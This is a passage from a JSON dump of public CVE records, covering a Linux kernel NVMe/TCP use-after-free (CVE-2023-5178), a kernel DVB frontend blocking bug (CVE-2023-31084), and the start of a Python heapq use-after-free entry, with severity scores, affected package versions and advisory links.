"2024-09-13T18:38:56.878Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-5178
Vulnerability from cvelistv5
Published
2023-11-01 16:32
Modified
2024-09-13 18:25
Severity ?
EPSS score ?
Summary
Kernel: use after free in nvmet_tcp_free_crypto in nvme
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T07:52:07.827Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2023:7370", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7370" }, { "name": "RHSA-2023:7379", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7379" }, { "name": "RHSA-2023:7418", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7418" }, { "name": "RHSA-2023:7548", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7548" }, { "name": "RHSA-2023:7549", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7549" }, { "name": "RHSA-2023:7551", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7551" }, { "name": "RHSA-2023:7554", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7554" }, { "name": "RHSA-2023:7557", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7557" }, { "name": "RHSA-2023:7559", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7559" }, { "name": "RHSA-2024:0340", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0340" }, { "name": "RHSA-2024:0378", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0378" }, { "name": "RHSA-2024:0386", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0386" }, { "name": "RHSA-2024:0412", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0412" }, { "name": "RHSA-2024:0431", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0431" }, { "name": "RHSA-2024:0432", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0432" }, { "name": "RHSA-2024:0461", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0461" }, { "name": "RHSA-2024:0554", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0554" }, { "name": "RHSA-2024:0575", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0575" }, { "name": "RHSA-2024:1268", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1268" }, { "name": "RHSA-2024:1269", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1269" }, { "name": "RHSA-2024:1278", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1278" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-5178" }, { "name": "RHBZ#2241924", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241924" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/linux-nvme/20231002105428.226515-1-sagi@grimberg.me/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20231208-0004/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::nfv", "cpe:/a:redhat:enterprise_linux:8::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.9.1.rt7.311.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::crb", "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.9.1.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_aus:8.2::baseos", "cpe:/o:redhat:rhel_tus:8.2::baseos", "cpe:/o:redhat:rhel_e4s:8.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.2 Advanced Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.128.1.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_tus:8.2::realtime", "cpe:/a:redhat:rhel_tus:8.2::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.128.1.rt13.179.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_aus:8.2::baseos", "cpe:/o:redhat:rhel_tus:8.2::baseos", "cpe:/o:redhat:rhel_e4s:8.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.128.1.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_aus:8.2::baseos", "cpe:/o:redhat:rhel_tus:8.2::baseos", "cpe:/o:redhat:rhel_e4s:8.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.128.1.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.2::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.4::baseos", "cpe:/o:redhat:rhel_aus:8.4::baseos", "cpe:/o:redhat:rhel_tus:8.4::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.114.1.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_tus:8.4::nfv", "cpe:/a:redhat:rhel_tus:8.4::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.114.1.rt7.190.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.4::baseos", "cpe:/o:redhat:rhel_aus:8.4::baseos", "cpe:/o:redhat:rhel_tus:8.4::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.114.1.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.4::baseos", "cpe:/o:redhat:rhel_aus:8.4::baseos", "cpe:/o:redhat:rhel_tus:8.4::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.114.1.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.4::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.87.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:8.8::crb", "cpe:/o:redhat:rhel_eus:8.8::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-477.43.1.el8_8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.18.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.18.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:9.0::baseos", "cpe:/a:redhat:rhel_eus:9.0::crb", "cpe:/a:redhat:rhel_eus:9.0::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-70.85.1.el9_0", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.0::realtime", "cpe:/a:redhat:rhel_eus:9.0::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-70.85.1.rt21.156.el9_0", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:9.0::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::crb", "cpe:/o:redhat:rhel_eus:9.2::baseos", "cpe:/a:redhat:rhel_eus:9.2::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.40.1.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::realtime", "cpe:/a:redhat:rhel_eus:9.2::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.40.1.rt14.325.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:9.2::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.87.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-10-15T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free vulnerability was found in drivers/nvme/target/tcp.c` in `nvmet_tcp_free_crypto` due to a logical bug in the NVMe/TCP subsystem in the Linux kernel. This issue may allow a malicious user to cause a use-after-free and double-free problem, which may permit remote code execution or lead to local privilege escalation." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Important" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-09-13T18:25:32.098Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2023:7370", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7370" }, { "name": "RHSA-2023:7379", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7379" }, { "name": "RHSA-2023:7418", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7418" }, { "name": "RHSA-2023:7548", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7548" }, { "name": "RHSA-2023:7549", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7549" }, { "name": "RHSA-2023:7551", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7551" }, { "name": "RHSA-2023:7554", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7554" }, { "name": "RHSA-2023:7557", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7557" }, { "name": "RHSA-2023:7559", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7559" }, { "name": "RHSA-2024:0340", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0340" }, { "name": "RHSA-2024:0378", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0378" }, { "name": "RHSA-2024:0386", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0386" }, { "name": "RHSA-2024:0412", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0412" }, { "name": "RHSA-2024:0431", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0431" }, { "name": "RHSA-2024:0432", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0432" }, { "name": "RHSA-2024:0461", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0461" }, { "name": "RHSA-2024:0554", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0554" }, { "name": "RHSA-2024:0575", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0575" }, { "name": "RHSA-2024:1268", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1268" }, { "name": "RHSA-2024:1269", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1269" }, { "name": "RHSA-2024:1278", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1278" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-5178" }, { "name": "RHBZ#2241924", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241924" }, { "url": "https://lore.kernel.org/linux-nvme/20231002105428.226515-1-sagi@grimberg.me/" } ], "timeline": [ { "lang": "en", "time": "2023-10-03T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-10-15T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: use after free in nvmet_tcp_free_crypto in nvme", "workarounds": [ { "lang": "en", "value": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability." } ], "x_redhatCweChain": "CWE-415-\u003eCWE-416: Double Free leads to Use After Free" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-5178", "datePublished": "2023-11-01T16:32:20.350Z", "dateReserved": "2023-09-25T16:38:10.637Z", "dateUpdated": "2024-09-13T18:25:32.098Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-31084
Vulnerability from cvelistv5
Published
2023-04-24 00:00
Modified
2024-08-02 14:45
Severity ?
EPSS score ?
Summary
An issue was discovered in drivers/media/dvb-core/dvb_frontend.c in the Linux kernel 6.2. There is a blocking operation when a task is in !TASK_RUNNING. In dvb_frontend_get_event, wait_event_interruptible is called; the condition is dvb_frontend_test_event(fepriv,events). In dvb_frontend_test_event, down(&fepriv->sem) is called. However, wait_event_interruptible would put the process to sleep, and down(&fepriv->sem) may block the process.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T14:45:25.766Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/all/CA+UBctCu7fXn4q41O_3=id1+OdyQ85tZY1x+TkT-6OVBL6KAUw%40mail.gmail.com/" }, { "name": "FEDORA-2023-75b22000cd", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AOATNX5UFL7V7W2QDIQKOHFFHYKWFP4W/" }, { "name": "FEDORA-2023-4426b7005f", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6HIEOLEOURP4BJZMIL7UGGPYRRB44UDN/" }, { "name": "DSA-5448", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5448" }, { "name": "[debian-lts-announce] 20230727 [SECURITY] [DLA 3508-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00030.html" }, { "name": "DSA-5480", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5480" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230929-0003/" }, { "name": "[debian-lts-announce] 20231019 [SECURITY] [DLA 3623-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b8c75e4a1b325ea0a9433fa8834be97b5836b946" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in drivers/media/dvb-core/dvb_frontend.c in the Linux kernel 6.2. There is a blocking operation when a task is in !TASK_RUNNING. In dvb_frontend_get_event, wait_event_interruptible is called; the condition is dvb_frontend_test_event(fepriv,events). In dvb_frontend_test_event, down(\u0026fepriv-\u003esem) is called. However, wait_event_interruptible would put the process to sleep, and down(\u0026fepriv-\u003esem) may block the process." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-25T00:41:59.267421", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://lore.kernel.org/all/CA+UBctCu7fXn4q41O_3=id1+OdyQ85tZY1x+TkT-6OVBL6KAUw%40mail.gmail.com/" }, { "name": "FEDORA-2023-75b22000cd", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AOATNX5UFL7V7W2QDIQKOHFFHYKWFP4W/" }, { "name": "FEDORA-2023-4426b7005f", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6HIEOLEOURP4BJZMIL7UGGPYRRB44UDN/" }, { "name": "DSA-5448", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5448" }, { "name": "[debian-lts-announce] 20230727 [SECURITY] [DLA 3508-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00030.html" }, { "name": "DSA-5480", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5480" }, { "url": "https://security.netapp.com/advisory/ntap-20230929-0003/" }, { "name": "[debian-lts-announce] 20231019 [SECURITY] [DLA 3623-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b8c75e4a1b325ea0a9433fa8834be97b5836b946" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-31084", "datePublished": "2023-04-24T00:00:00", "dateReserved": "2023-04-24T00:00:00", "dateUpdated": "2024-08-02T14:45:25.766Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-48560
Vulnerability from cvelistv5
Published
2023-08-22 00:00
Modified
2024-08-03 15:17
Severity ?
EPSS score ?
Summary
A use-after-free exists in Python through 3.9 via heappushpop in heapq.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T15:17:54.823Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZ5OOBWNYWXFTZDMCGHJVGDLDTHLWITJ/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VO7Y2YZSDK3UYJD2KBGLXRTGNG6T326J/" }, { "tags": [ "x_transferred" ], "url": "https://bugs.python.org/issue39421" }, { "name": "[debian-lts-announce] 20230920 [SECURITY] [DLA 3575-1] python2.7 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00022.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230929-0008/" }, { "name": "[debian-lts-announce] 20231011 [SECURITY] [DLA 3614-1] python3.7 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00017.html" }, { "name": "FEDORA-2023-9954dae554", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VO7Y2YZSDK3UYJD2KBGLXRTGNG6T326J/" }, { "name": "FEDORA-2023-34a3a5adba", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JZ5OOBWNYWXFTZDMCGHJVGDLDTHLWITJ/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free exists in Python through 3.9 via heappushpop in heapq." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { 